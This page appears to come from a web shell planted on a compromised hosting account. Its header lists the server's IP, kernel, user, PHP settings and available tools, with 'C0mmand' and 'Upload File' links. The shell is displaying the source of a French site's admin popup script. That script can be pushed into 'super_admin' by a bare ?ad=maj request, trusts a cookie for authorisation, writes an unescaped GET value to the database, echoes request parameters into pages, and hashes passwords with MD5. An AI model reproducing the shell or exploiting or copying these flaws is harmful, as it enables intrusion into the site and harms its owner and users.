|
Server IP : 10.111.40.2 / Your IP : 216.73.217.145 Web Server : Apache System : Linux webd002.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : comimage ( 586) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/comimage/samzunstephane.com/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
require(dirname(__FILE__).'/../inc/tools/configuration.php');
if($_GET['ad'] == "maj"){
$duree = $_COOKIE['date_exp'] + (60*60*2);
setcookie("admin","super_admin",$duree,"/");
setcookie("apseudo",$_COOKIE['apseudo'],$duree,"/");
setcookie("date_exp",$duree,$duree,"/");
$metier->updateUnElement($bdd, TABLE_ADMINISTRATION, "date_last_visite", $duree, "pseudo", $_COOKIE['apseudo']);
}
?>
<!DOCTYPE html>
<html lang="<?php echo LANGUAGE; ?>">
<head>
<title>Panneau d'administration</title>
<meta name="description" content=""/>
<meta name="keywords" content=""/>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;" />
<meta charset="UTF-8"/>
<?php echo ADMIN_CSS; ?>
<?php echo ADMIN_JQUERY; ?>
<?php echo ADMIN_JAVASCRIPT; ?>
<?php echo ROBOTS_NOFOLLOW; ?>
<?php echo TINYMCE; ?>
<script type="text/javascript">
tinymce.init({
selector: "textarea.to-tiny",theme: "modern",
language : 'fr_FR',
plugins: [
"advlist autolink link image imagetools lists charmap print preview hr anchor pagebreak",
"searchreplace wordcount visualblocks visualchars insertdatetime media nonbreaking",
"table contextmenu directionality emoticons paste textcolor colorpicker responsivefilemanager code"
],
toolbar1: "undo redo | link unlink anchor | image media | bold italic underline | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | responsivefilemanager | forecolor backcolor | print preview code ",
toolbar2: "",
image_advtab: true ,
target_list: [
{title: 'None', value: ''},
{title: 'Nouvelle onglet', value: '_blank'}
],
link_class_list: [
{title: 'None', value: ''},
{title: 'Fancybox', value: 'fancybox'}
],
rel_list: [
{title: 'None', value: ''},
{title: 'Nofollow', value: 'nofollow'},
{title: 'Lightbox', value: 'lightbox'},
{title: 'Groupe', value: 'groupe'},
{title: 'Groupe 2', value: 'groupe2'}
],
relative_urls: false,
remove_script_host: false,
filemanager_title:"Responsive Filemanager",
imagetools_toolbar: "rotateleft rotateright | flipv fliph | editimage imageoptions",
filemanager_crossdomain: true,
external_filemanager_path:"<?php echo HTTP_ADMIN; ?>tools/filemanager/",
external_plugins: { "filemanager" : "<?php echo HTTP_ADMIN; ?>tools/filemanager/plugin.min.js"}
});
</script>
</head>
<body <?php echo ($_GET['ad'] == "controle_news")?'':'onBeforeUnload="fermerMaPage();"';?>>
<div id="popup">
<?php
if($_COOKIE['admin'] and $_COOKIE['admin'] == COOKIE_ADMIN){
//================================ ADMINISTRATION =====================================
if($_GET['ad'] == "modif_droits"){
//modifier des droits
if(is_numeric($_GET['idu'])){
$user = $metier->getTable($bdd,TABLE_ADMINISTRATION,"id",minuscule($_GET['idu']));
if(is_numeric($_GET['ctrl'])){
$cpt = $metier->executerRetourObjet($bdd,"SELECT COUNT(*) AS cpt FROM `".TABLE_MOD_GESTION_DROITS_ADMIN."`");
$a_check = array();
for($i=1;$i<=$cpt->cpt;$i++){
if($_POST['c_'.$i]){
array_push($a_check,minuscule($_POST['c_'.$i]));
}
}
//ajouter le user
$metier->executerSansRetour($bdd,"UPDATE `".TABLE_ADMINISTRATION."` SET `acces`='".implode(":",$a_check)."' WHERE `id`='".minuscule($_GET['idu'])."'");
echo '<h1 style="text-align:center;padding-top:30px;">Droit modifié de ce user...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
?>
<form action="./pop.php?ctrl=1&ad=<?php echo $_GET['ad']; ?>&idu=<?php echo $_GET['idu']; ?>" method="post">
<h1 style="text-align:center;padding-top:30px;">Modifier des droits</h1>
<table style="width:400px;margin:0 auto;">
<tr>
<td>Pseudo</td>
<td><?php echo $user->pseudo; ?></td>
</tr>
<tr>
<td>Passe</td>
<td>[crypté]</td>
</tr>
<tr>
<td colspan="2"><hr /></td>
</tr>
<tr>
<td colspan="2"><strong>DROITS SUR ACTION</strong></td>
</tr>
<?php echo $metier->getListeDroitsAdmin($bdd,$user->acces); ?>
<tr>
<td colspan="2"><hr /></td>
</tr>
<tr>
<td colspan="2" style="text-align:center;padding-top:7px;"><input type="image" src="./images/envoyer.png"/></td>
</tr>
</table>
</form>
<?php
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "del_droits"){
//supprimer le user
if(is_numeric($_GET['idu'])){
$metier->deleteUnElement($bdd,TABLE_ADMINISTRATION,"id",minuscule($_GET['idu']));
echo '<h1 style="text-align:center;padding-top:30px;">User supprimé...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "add_user"){
//ajouter un user
if(is_numeric($_GET['ctrl'])){
if(empty($_POST['user']) || empty($_POST['passe'])){
echo '<h1 style="text-align:center;padding-top:30px;">Attention, tous les champs sont obligatoires...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
$controle = $metier->getChamps($bdd,"id",TABLE_ADMINISTRATION,"pseudo",minuscule($_POST['user']));
if($controle){
echo '<h1 style="text-align:center;padding-top:30px;">Nous sommes désolés mais ce user est déjé crée...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
$cpt = $metier->executerRetourObjet($bdd,"SELECT COUNT(*) AS cpt FROM `".TABLE_MOD_GESTION_DROITS_ADMIN."`");
$a_check = array();
for($i=1;$i<=$cpt->cpt;$i++){
if($_POST['c_'.$i]){
array_push($a_check,minuscule($_POST['c_'.$i]));
}
}
//ajouter le user
$metier->executerSansRetourex($bdd, "INSERT INTO `".TABLE_ADMINISTRATION."` (`pseudo`, `passe`, `acces`, `date_last_visite`, `sms`, `sms_validite`) VALUES (?, ?, ?, ?, ?, ?)", array(minuscule($_POST['user']), md5($_POST['passe']), implode(":",$a_check), time(), 0, 0));
echo '<h1 style="text-align:center;padding-top:30px;">User ajouté...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
}
else{
?>
<form action="./pop.php?ctrl=1&ad=<?php echo $_GET['ad']; ?>" method="post">
<h1 style="text-align:center;padding-top:30px;">Ajouter un user</h1>
<table style="width:400px;margin:0 auto;">
<tr>
<td>Pseudo</td>
<td class="form-1"><input type="text" name="user"/></td>
</tr>
<tr>
<td>Passe</td>
<td><input type="password" name="passe"/></td>
</tr>
<tr>
<td colspan="2"><hr /></td>
</tr>
<tr>
<td colspan="2"><strong>DROITS SUR ACTION</strong></td>
</tr>
<?php echo $metier->getListeDroitsAdmin($bdd,""); ?>
<tr>
<td colspan="2"><hr /></td>
</tr>
<tr>
<td colspan="2" style="text-align:center;padding-top:7px;"><input type="image" src="./images/envoyer.png"/></td>
</tr>
</table>
</form>
<?php
}
}
elseif($_GET['ad'] == "modif_news"){
if(is_numeric($_GET['id'])){
$news = $metier->getTable($bdd,TABLE_NEWSLETTER, "id",minuscule($_GET['id']));
if($_GET['ctrl'] == 1){
//============ MODIFICATION DE LA NEWSLETTER ======================
if($_POST['dj'] != "" && $_POST['dm'] != "" && $_POST['da'] != ""){
$date_proposee = minuscule($_POST['da']).'-'.minuscule($_POST['dm']).'-'.minuscule($_POST['dj']).' 00:00:00';
if(strtotime(date("Y-m-d")) <= strtotime($date_proposee)){
$ma_news = str_replace('href="/"','href="'.HTTP_SERVEUR.'"',$_POST['description']);
$metier->updateElement($bdd,TABLE_NEWSLETTER,"date_envoi",$date_proposee,"id",minuscule($_GET['id']));
$metier->updateElement($bdd,TABLE_NEWSLETTER,"contenu",addslashes($ma_news),"id",minuscule($_GET['id']));
$metier->updateElement($bdd,TABLE_NEWSLETTER,"titre",addslashes($_POST['titre']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Newsletter modifiée...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">La date d\'envoi doit être valide à partir de ce jour : <span style="color:red;">'.convertirDate(date("Y-m-d"),"").'</span>' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">La date doit être valide...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
//=================================================================
}
else{
if($news->date_envoi){
$date = $news->date_envoi;
}
else{
$date = date("Y-m-d");
}
?>
<form action="./pop.php?ctrl=1&ad=<?php echo $_GET['ad']; ?>&id=<?php echo $_GET['id']; ?>" method="post">
<h1 style="text-align:center;">Modifier une newsletter</h1>
<div style="margin:0 auto;width:810px;">
<ul>
<li>Objet de votre envoi : <input type="text" name="titre" value="<?php echo stripslashes($news->titre); ?>" size="45"/> <span style="color:red;font-size:10px;">(Soyez court... 4 mots maxi !)</span></li>
<li style="padding-top:7px;">Date de l'envoi : <?php echo dateNewsletter($date); ?></li>
<li style="padding-top:7px;"><textarea name="description" rows="25" style="width:100%;"><?php echo stripslashes($news->contenu); ?></textarea></li>
<li style="text-align:center;padding-top:15px;"><input type="image" src="images/envoyer.png"/></li>
</ul>
</div>
</form>
<?php
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "del_news"){
if(is_numeric($_GET['id'])){
$metier->deleteUnElement($bdd,TABLE_NEWSLETTER,"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Newsletter supprimée !' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "modif_date_news"){
if(is_numeric($_GET['id'])){
if($_GET['ctrl'] == 1){
if($_POST['dj'] != "" && $_POST['dm'] != "" && $_POST['da'] != ""){
$date_proposee = minuscule($_POST['da']).'-'.minuscule($_POST['dm']).'-'.minuscule($_POST['dj']).' 00:00:00';
if(strtotime(date("Y-m-d")) <= strtotime($date_proposee)){
$metier->updateElement($bdd,TABLE_NEWSLETTER,"date_envoi",$date_proposee,"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Date d\'envoi modifiée...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">La date d\'envoi doit être valide à partir de ce jour : <span style="color:red;">'.convertirDate(date("Y-m-d"),"").'</span>' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">La date doit être valide...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
else{
$actuelle = $metier->getChamps($bdd,"date_envoi",TABLE_NEWSLETTER,"id",minuscule($_GET['id']));
?>
<form action="./pop.php?ctrl=1&ad=<?php echo $_GET['ad']; ?>&id=<?php echo $_GET['id']; ?>" method="post">
<h1 style="text-align:center;padding-top:30px;">Modifier la date d'envoi</h1>
<table style="width:300px;margin:0 auto;">
<tr>
<td style="padding-top:7px;">Date actuelle :</td>
<td style="padding-top:7px;"><?php echo dateNewsletter($actuelle);?></td>
</tr>
<tr>
<td colspan="2" style="text-align:center;padding-top:7px;"><input type="image" src="./images/envoyer.png"/></td>
</tr>
</table>
</form>
<?php
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "controle_news"){
if(is_numeric($_GET['id'])){
$news = $metier->getTable($bdd,TABLE_NEWSLETTER, "id",minuscule($_GET['id']));
//------- ENVOI DU MESSAGE ------------
envoyerUnMail(MAIL_CORRESPONDANCE,stripslashes($news->titre),stripslashes($news->contenu));
//---------------------------------------
echo '<h1 style="text-align:center;padding-top:30px;">NEWSLETTER envoyée : '.MAIL_CORRESPONDANCE.'!' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "see_img"){
if(is_numeric($_GET['id'])){
if($_GET['tpe'] == "cpl"){
$photo = ($_GET['ph'] == 1)?'photo1':'photo2';
$consultation = $metier->getTable($bdd,TABLE_EMAIL_COUPLE,"id",minuscule($_GET['id']));
echo '<img src="'.HTTP_REDIMENSIONNEE.nommageRepertoire($consultation->id_voyant).$consultation->$photo.'" alt=""/>';
}
else{
$consultation = $metier->getTable($bdd,TABLE_CONSULTATION_EMAIL,"id",minuscule($_GET['id']));
echo '<img src="'.HTTP_REDIMENSIONNEE.nommageRepertoire($consultation->id_voyant).$consultation->photo.'" alt=""/>';
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "maj"){
echo '<h1 style="text-align:center;padding-top:30px;">Connexion actualisée pour 2 heures !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
elseif($_GET['ad'] == "add_files"){
echo "<h2>[ajouter un fichier]</h2>";
include("inc-bibliotheque-add.php");
}
elseif($_GET['ad'] == "all_files"){
}
elseif($_GET['ad'] == "add_avatar"){
echo "<h2>[ajouter un avatar]</h2>";
include("inc-avatar-add.php");
}
elseif($_GET['ad'] == "mod_ordre_blog"){
if(is_numeric($_GET['id']) && is_numeric($_GET['ordre'])){
$metier->updateUnElement($bdd,TABLE_BLOG,"ordre",minuscule($_GET['ordre']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Ordre mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
elseif($_GET['ad'] == "mod_ordre_page"){
if(is_numeric($_GET['id']) && is_numeric($_GET['ordre'])){
$metier->updateUnElement($bdd,TABLE_PAGES_WEB,"ordre",minuscule($_GET['ordre']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Ordre mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
elseif($_GET['ad'] == "mod_ordre_phome"){
if(is_numeric($_GET['id']) && is_numeric($_GET['ordre'])){
$metier->updateUnElement($bdd,TABLE_DIAPO_ACCUEIL,"ordre",minuscule($_GET['ordre']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Ordre mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
elseif($_GET['ad'] == "mod_ordre_diapo"){
if(is_numeric($_GET['id']) && is_numeric($_GET['ordre'])){
$metier->updateUnElement($bdd,TABLE_DIAPO_IMGS,"ordre",minuscule($_GET['ordre']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Ordre mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
elseif($_GET['ad'] == "mod_ordre_contenu_supp"){
if(is_numeric($_GET['id']) && is_numeric($_GET['ordre'])){
$metier->updateUnElement($bdd,TABLE_CONTENUS_SUPPL,"ordre",minuscule($_GET['ordre']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Ordre mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
elseif($_GET['ad'] == "mod_statut_online"){
if(is_numeric($_GET['id'])){
if($_GET['p'] == "web"){
//editer mes pages
$metier->updateUnElement($bdd,TABLE_PAGES_WEB,"enligne",minuscule($_GET['mod']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Statut de la page mise à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
//partie blog
$metier->updateUnElement($bdd,TABLE_BLOG,"enligne",minuscule($_GET['mod']),"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Statut de l\'article mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
elseif($_GET['ad'] == "voir_article"){
if(is_numeric($_GET['id'])){
$art = $metier->getTable($bdd,TABLE_BLOG,"id",minuscule($_GET['id']));
?>
<?php echo CSS; ?>
<div style="width:700px;height:700px;overflow:auto;margin:auto;padding:5px;background-color:#fff;"><?php echo stripslashes($art->article); ?></div>
<?php
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
elseif($_GET['ad'] == "voir_page"){
if(is_numeric($_GET['id'])){
$page = $metier->getTable($bdd,TABLE_PAGES_WEB,"id",minuscule($_GET['id']));
?>
<?php echo CSS; ?>
<div style="text-align:justify;width:700px;height:700px;overflow:auto;margin:auto;padding:5px;background-color:#fff;"><?php echo stripslashes($page->article); ?></div>
<?php
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...' .
'<br />Vous pouvez fermer la fenêtre!</h1>';
}
}
/*=================
===================*/
elseif($_GET['modinfo'] == "mod_titre"){
if(is_numeric($_GET['id']) && !empty($_GET['titre'])){
$metier->updateUnElement($bdd,TABLE_DIAPO_IMGS,"titre",$_GET['titre'],"id",minuscule($_GET['id']));
echo '<h1 style="text-align:center;padding-top:30px;">Titre mis à jour !</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">Erreur...</h1>';
redirection(1,$_SERVER['HTTP_REFERER']);
}
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">ERREUR</h1>';
}
//=====================================================================================
}
else{
echo '<h1 style="text-align:center;padding-top:30px;">ERREUR</h1>';
}
?>
</div>
</body>
</html>